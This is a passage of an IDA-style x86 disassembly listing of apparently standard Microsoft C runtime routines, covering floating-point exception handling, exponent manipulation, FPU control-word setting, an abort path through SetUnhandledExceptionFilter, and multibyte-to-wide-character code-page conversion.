fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FFA9
fld dbl_4240C8
jmp short loc_40FFB1
; ---------------------------------------------------------------------------
loc_40FF93: ; CODE XREF: sub_40FED1+6Cj
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FFA9
loc_40FFA1: ; CODE XREF: sub_40FED1+A2j
fld dbl_4240B8
jmp short loc_40FFB1
; ---------------------------------------------------------------------------
loc_40FFA9: ; CODE XREF: sub_40FED1+B8j
; sub_40FED1+CEj
fld dbl_4240B8
loc_40FFAF: ; CODE XREF: sub_40FED1+94j
; sub_40FED1+AAj
fchs
loc_40FFB1: ; CODE XREF: sub_40FED1+92j
; sub_40FED1+C0j ...
fstp qword ptr [ecx]
loc_40FFB3: ; CODE XREF: sub_40FED1+7Ej
and esi, 0FFFFFFFEh
jmp loc_410090
; ---------------------------------------------------------------------------
loc_40FFBB: ; CODE XREF: sub_40FED1+4Aj
; sub_40FED1+54j
test al, 2
jz loc_410090
test byte ptr [ebp+arg_8], 10h
jz loc_410090
xor esi, esi
test al, 10h
jz short loc_40FFD5
mov esi, ebx
loc_40FFD5: ; CODE XREF: sub_40FED1+100j
fldz
push edi
mov edi, [ebp+arg_4]
fcomp qword ptr [edi]
fnstsw ax
test ah, 44h
jnp loc_41007A
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_410348
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_41001C
fld [ebp+var_10]
mov esi, ebx
fmul ds:dbl_41EE28
jmp short loc_410070
; ---------------------------------------------------------------------------
loc_41001C: ; CODE XREF: sub_40FED1+13Cj
fldz
fcomp [ebp+var_10]
fnstsw ax
test ah, 41h
jnz short loc_41002C
mov edx, ebx
jmp short loc_41002E
; ---------------------------------------------------------------------------
loc_41002C: ; CODE XREF: sub_40FED1+155j
xor edx, edx
loc_41002E: ; CODE XREF: sub_40FED1+159j
movzx eax, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_410067
sub eax, ecx
loc_410047: ; CODE XREF: sub_40FED1+194j
test byte ptr [ebp+var_10], bl
jz short loc_410052
test esi, esi
jnz short loc_410052
mov esi, ebx
loc_410052: ; CODE XREF: sub_40FED1+179j
; sub_40FED1+17Dj
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_410061
or dword ptr [ebp+var_10], 80000000h
loc_410061: ; CODE XREF: sub_40FED1+187j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_410047
loc_410067: ; CODE XREF: sub_40FED1+172j
test edx, edx
jz short loc_410073
fld [ebp+var_10]
fchs
loc_410070: ; CODE XREF: sub_40FED1+149j
fstp [ebp+var_10]
loc_410073: ; CODE XREF: sub_40FED1+198j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_41007C
; ---------------------------------------------------------------------------
loc_41007A: ; CODE XREF: sub_40FED1+111j
mov esi, ebx
loc_41007C: ; CODE XREF: sub_40FED1+1A7j
test esi, esi
pop edi
jz short loc_410089
push 10h
call sub_410435
pop ecx
loc_410089: ; CODE XREF: sub_40FED1+1AEj
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_410090: ; CODE XREF: sub_40FED1+29j
; sub_40FED1+43j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_4100A7
test byte ptr [ebp+arg_8], 20h
jz short loc_4100A7
push 20h
call sub_410435
pop ecx
and esi, 0FFFFFFEFh
loc_4100A7: ; CODE XREF: sub_40FED1+1C3j
; sub_40FED1+1C9j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_40FED1 endp
; =============== S U B R O U T I N E =======================================
sub_4100B2 proc near ; CODE XREF: sub_410107+6Cp
; sub_410107+91p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_4100CE
jle short locret_4100D9
cmp eax, 3
jg short locret_4100D9
call sub_405B83
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_4100CE: ; CODE XREF: sub_4100B2+7j
call sub_405B83
mov dword ptr [eax], 21h
locret_4100D9: ; CODE XREF: sub_4100B2+9j
; sub_4100B2+Ej
retn
sub_4100B2 endp
; =============== S U B R O U T I N E =======================================
sub_4100DA proc near ; CODE XREF: sub_4101F8+55p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_4100E6
push 5
jmp short loc_4100FC
; ---------------------------------------------------------------------------
loc_4100E6: ; CODE XREF: sub_4100DA+6j
test al, 8
jz short loc_4100EE
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4100EE: ; CODE XREF: sub_4100DA+Ej
test al, 4
jz short loc_4100F6
push 2
jmp short loc_4100FC
; ---------------------------------------------------------------------------
loc_4100F6: ; CODE XREF: sub_4100DA+16j
test al, 1
jz short loc_4100FE
push 3
loc_4100FC: ; CODE XREF: sub_4100DA+Aj
; sub_4100DA+1Aj
pop eax
retn
; ---------------------------------------------------------------------------
loc_4100FE: ; CODE XREF: sub_4100DA+1Ej
movzx eax, al
and eax, 2
add eax, eax
retn
sub_4100DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410107(int,int,int,int,int,int,double,int)
sub_410107 proc near ; CODE XREF: sub_4101A5+2Ap
; sub_4101F8+87p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_41010F: ; CODE XREF: sub_410107+18j
mov ecx, dword_423FD0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_41017F
inc eax
cmp eax, 1Dh
jl short loc_41010F
xor eax, eax
loc_410123: ; CODE XREF: sub_410107+7Fj
test eax, eax
mov [ebp+var_1C], eax
jz short loc_410188
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41040E
lea eax, [ebp+var_20]
push eax
call sub_40FAB8
add esp, 0Ch
test eax, eax
jnz short loc_410179
push esi
call sub_4100B2
pop ecx
loc_410179: ; CODE XREF: sub_410107+69j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41017F: ; CODE XREF: sub_410107+12j
mov eax, off_423FD4[eax*8]
jmp short loc_410123
; ---------------------------------------------------------------------------
loc_410188: ; CODE XREF: sub_410107+21j
push 0FFFFh
push [ebp+arg_20]
call sub_41040E
push [ebp+arg_0]
call sub_4100B2
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_410107 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4101A5(int,double,int)
sub_4101A5 proc near ; CODE XREF: sub_40ACF3+51p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_423FC0, 0
jnz short loc_4101D9
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_410107
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4101D9: ; CODE XREF: sub_4101A5+Aj
call sub_405B83
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41040E
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_4101A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4101F8(int,int,double,double,int)
sub_4101F8 proc near ; CODE XREF: sub_40ACF3:loc_40ADB8p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, dword_423064
xor eax, esp
mov [esp+80h+var_4], eax
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_40FED1
add esp, 0Ch
test eax, eax
jnz short loc_41024A
and [esp+80h+var_40], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+98h+var_80]
push eax
call sub_40FBF7
add esp, 1Ch
loc_41024A: ; CODE XREF: sub_4101F8+2Bj
push [ebp+arg_0]
call sub_4100DA
add esp, 4
cmp dword_423FC0, 0
jnz short loc_410289
test eax, eax
jz short loc_410289
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_410107
add esp, 24h
jmp short loc_4102A3
; ---------------------------------------------------------------------------
loc_410289: ; CODE XREF: sub_4101F8+64j
; sub_4101F8+68j
push eax
call sub_4100B2
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41040E
fld [ebp+arg_10]
pop ecx
pop ecx
loc_4102A3: ; CODE XREF: sub_4101F8+8Fj
mov ecx, [esp+80h+var_4]
xor ecx, esp
call sub_402ADC
mov esp, ebp
pop ebp
retn
sub_4101F8 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4102B2(double)
sub_4102B2 proc near ; CODE XREF: sub_40ACF3:loc_40AD79p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_4102B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4102C3(double,int)
sub_4102C3 proc near ; CODE XREF: sub_410348+79p
; sub_410348+8Ep
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_4102C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102ED proc near ; CODE XREF: sub_40ACF3+31p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_410305
cmp [ebp+arg_0], edx
jnz short loc_410318
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_410305: ; CODE XREF: sub_4102ED+Cj
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_410318
cmp [ebp+arg_0], edx
jnz short loc_410318
push 2
loc_410315: ; CODE XREF: sub_4102ED+3Cj
; sub_4102ED+55j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_410318: ; CODE XREF: sub_4102ED+11j
; sub_4102ED+1Fj ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41032B
push 3
jmp short loc_410315
; ---------------------------------------------------------------------------
loc_41032B: ; CODE XREF: sub_4102ED+38j
cmp cx, 7FF0h
jnz short loc_410344
test [ebp+arg_4], 7FFFFh
jnz short loc_410340
cmp [ebp+arg_0], edx
jz short loc_410344
loc_410340: ; CODE XREF: sub_4102ED+4Cj
push 4
jmp short loc_410315
; ---------------------------------------------------------------------------
loc_410344: ; CODE XREF: sub_4102ED+43j
; sub_4102ED+51j
xor eax, eax
pop ebp
retn
sub_4102ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410348(double,int)
sub_410348 proc near ; CODE XREF: sub_40FED1+122p
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
fldz
fcom [ebp+arg_0]
fnstsw ax
test ah, 44h
jp short loc_41035E
xor edx, edx
jmp loc_4103F0
; ---------------------------------------------------------------------------
loc_41035E: ; CODE XREF: sub_410348+Dj
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_4103CB
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_410376
cmp dword ptr [ebp+arg_0], ecx
jz short loc_4103CB
loc_410376: ; CODE XREF: sub_410348+27j
fcomp [ebp+arg_0]
mov edx, 0FFFFFC03h
fnstsw ax
test ah, 41h
jnz short loc_41038A
xor eax, eax
inc eax
jmp short loc_4103A2
; ---------------------------------------------------------------------------
loc_41038A: ; CODE XREF: sub_410348+3Bj
xor eax, eax
jmp short loc_4103A2
; ---------------------------------------------------------------------------
loc_41038E: ; CODE XREF: sub_410348+5Ej
shl dword ptr [ebp+arg_0+4], 1
test dword ptr [ebp+arg_0], 80000000h
jz short loc_41039E
or dword ptr [ebp+arg_0+4], 1
loc_41039E: ; CODE XREF: sub_410348+50j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_4103A2: ; CODE XREF: sub_410348+40j
; sub_410348+44j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_41038E
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_4103B8
or word ptr [ebp+arg_0+6], 8000h
loc_4103B8: ; CODE XREF: sub_410348+68j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_4102C3
add esp, 0Ch
jmp short loc_4103F0
; ---------------------------------------------------------------------------
loc_4103CB: ; CODE XREF: sub_410348+1Ej
; sub_410348+2Cj
push ecx ; int
fstp st
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_4102C3
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_4103F0: ; CODE XREF: sub_410348+11j
; sub_410348+81j
mov eax, [ebp+arg_8]
mov [eax], edx
pop ebp
retn
sub_410348 endp
; =============== S U B R O U T I N E =======================================
sub_4103F7 proc near ; CODE XREF: sub_40FBF7+DCp
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_4103F7 endp
; =============== S U B R O U T I N E =======================================
sub_410402 proc near ; CODE XREF: sub_40FBF7:loc_40FE0Ap
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41040E proc near ; CODE XREF: sub_40ACF3+13p
; sub_40ACF3+5Dp ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
movzx eax, ax
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41040E endp
; =============== S U B R O U T I N E =======================================
sub_410435 proc near ; CODE XREF: sub_40FED1+20p
; sub_40FED1+3Ap ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41044B
fld tbyte_4240E0
fistp [esp+8+arg_0]
wait
loc_41044B: ; CODE XREF: sub_410435+9j
test cl, 8
jz short loc_410460
fstsw ax
fld tbyte_4240E0
fstp [esp+8+var_8]
wait
fstsw ax
loc_410460: ; CODE XREF: sub_410435+19j
test cl, 10h
jz short loc_41046F
fld tbyte_4240EC
fstp [esp+8+var_8]
wait
loc_41046F: ; CODE XREF: sub_410435+2Ej
test cl, 4
jz short loc_41047D
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41047D: ; CODE XREF: sub_410435+3Dj
test cl, 20h
jz short loc_410488
fldpi
fstp [esp+8+var_8]
wait
loc_410488: ; CODE XREF: sub_410435+4Bj
pop ecx
pop ecx
retn
sub_410435 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41048B proc near ; CODE XREF: sub_413857+243p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421C48
call __SEH_prolog4
xor eax, eax
cmp dword_435800, eax
jz short loc_4104F7
test byte ptr [ebp+arg_0], 40h
jz short loc_4104EF
cmp dword_4240F8, eax
jz short loc_4104EF
mov [ebp+ms_exc.disabled], eax
ldmxcsr [ebp+arg_0]
jmp short loc_4104E6
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_4104D0
cmp eax, 0C000001Dh
jz short loc_4104D0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4104D0: ; CODE XREF: sub_41048B+39j
; sub_41048B+40j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and dword_4240F8, 0
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_4104E6: ; CODE XREF: sub_41048B+2Bj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_4104F7
; ---------------------------------------------------------------------------
loc_4104EF: ; CODE XREF: sub_41048B+1Aj
; sub_41048B+22j
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_4104F7: ; CODE XREF: sub_41048B+14j
; sub_41048B+62j
call __SEH_epilog4
retn
sub_41048B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104FD proc near ; CODE XREF: sub_41054E+Ap
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_402AEB
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_41053C
cmp [ebp+arg_8], 0
jz short loc_410536
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_410538
; ---------------------------------------------------------------------------
loc_410536: ; CODE XREF: sub_4104FD+25j
xor eax, eax
loc_410538: ; CODE XREF: sub_4104FD+37j
test eax, eax
jz short loc_41053F
loc_41053C: ; CODE XREF: sub_4104FD+1Fj
xor eax, eax
inc eax
loc_41053F: ; CODE XREF: sub_4104FD+3Dj
cmp [ebp+var_4], 0
jz short locret_41054C
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_41054C: ; CODE XREF: sub_4104FD+46j
leave
retn
sub_4104FD endp
; =============== S U B R O U T I N E =======================================
sub_41054E proc near ; CODE XREF: sub_40AF33+3Fp
; sub_40B06B+53p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_4104FD
add esp, 10h
retn
sub_41054E endp
; =============== S U B R O U T I N E =======================================
sub_410561 proc near ; CODE XREF: sub_40B4CD+56p
; sub_40BA48+59p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_41056D
xor eax, eax
locret_41056D: ; CODE XREF: sub_410561+8j
retn
sub_410561 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_41056E proc near ; CODE XREF: sub_40C208:loc_40C236p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test byte_4240FC, 1
push esi
jz short loc_41059B
push 0Ah
call sub_409E64
pop ecx
loc_41059B: ; CODE XREF: sub_41056E+23j
call sub_40E0CC
test eax, eax
jz short loc_4105AC
push 16h
call sub_40E0D9
pop ecx
loc_4105AC: ; CODE XREF: sub_41056E+34j
test byte_4240FC, 2
jz loc_410659
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407F20
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:off_41D198
loc_410659: ; CODE XREF: sub_41056E+45j
push 3
call sub_407E9A
int 3 ; Trap to Debugger
sub_41056E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410661 proc near ; CODE XREF: sub_40C307+25Ap
; sub_40C6EC+150p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:off_41D054
test eax, eax
jnz short loc_410692
or eax, 0FFFFFFFFh
jmp short loc_41069C
; ---------------------------------------------------------------------------
loc_410692: ; CODE XREF: sub_410661+2Aj
lea eax, [ebp+var_C]
push eax
call sub_40415A
pop ecx
loc_41069C: ; CODE XREF: sub_410661+2Fj
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402ADC
leave
retn
sub_410661 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4106A8 proc near ; CODE XREF: sub_40C307+285p
; sub_40C307+336p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_410845
mov esi, ds:dword_41D1B4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi ; GetCPInfo
test eax, eax
mov ebx, ds:dword_41D0A0
jz short loc_41075B
cmp [ebp+var_18], 1
jnz short loc_41075B
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_41075B
cmp [ebp+var_18], 1
jnz short loc_41075B
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_410731
push [ebp+var_28]
call sub_4044E0
mov esi, eax
pop ecx
inc esi
loc_410731: ; CODE XREF: sub_4106A8+7Bj
cmp esi, edi
loc_410733: ; CODE XREF: sub_4106A8+C6j
jle short loc_410790
cmp esi, 7FFFFFF0h
ja short loc_410790
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_410777
call sub_410860
mov eax, esp
cmp eax, edi
jz short loc_41078B
mov dword ptr [eax], 0CCCCh
jmp short loc_410788
; ---------------------------------------------------------------------------
loc_41075B: ; CODE XREF: sub_4106A8+53j
; sub_4106A8+59j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
mov esi, eax
cmp esi, edi
jnz short loc_410733
loc_410770: ; CODE XREF: sub_4106A8+EEj
xor eax, eax
jmp loc_410848
; ---------------------------------------------------------------------------
loc_410777: ; CODE XREF: sub_4106A8+9Ej
push eax
call sub_403AAC
cmp eax, edi
pop ecx
jz short loc_41078B
mov dword ptr [eax], 0DDDDh
loc_410788: ; CODE XREF: sub_4106A8+B1j
add eax, 8
loc_41078B: ; CODE XREF: sub_4106A8+A9j
; sub_4106A8+D8j
mov [ebp+var_1C], eax
jmp short loc_410793
; ---------------------------------------------------------------------------
loc_410790: ; CODE XREF: sub_4106A8:loc_410733j
; sub_4106A8+93j
mov [ebp+var_1C], edi
loc_410793: ; CODE XREF: sub_4106A8+E6j
cmp [ebp+var_1C], edi
jz short loc_410770
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_407F20
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
test eax, eax
jz short loc_41083C
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_4107E1
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ds:dword_41D134 ; WideCharToMultiByte
test eax, eax
jz short loc_41083C
mov [ebp+var_20], ebx
jmp short loc_41083C
; ---------------------------------------------------------------------------
loc_4107E1: ; CODE XREF: sub_4106A8+11Aj
cmp [ebp+var_2C], edi
mov ebx, ds:dword_41D134
jnz short loc_410800
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_41083C
loc_410800: ; CODE XREF: sub_4106A8+142j
push esi
push 1
call sub_407B2A
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_41083C
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
cmp eax, edi
jnz short loc_410831
push [ebp+var_20]
call sub_4039CF
pop ecx
mov [ebp+var_20], edi
jmp short loc_41083C
; ---------------------------------------------------------------------------
loc_410831: ; CODE XREF: sub_4106A8+179j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_41083C
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_41083C: ; CODE XREF: sub_4106A8+113j
; sub_4106A8+132j ...
push [ebp+var_1C]
call sub_40C2EC
pop ecx
loc_410845: ; CODE XREF: sub_4106A8+38j
mov eax, [ebp+var_20]
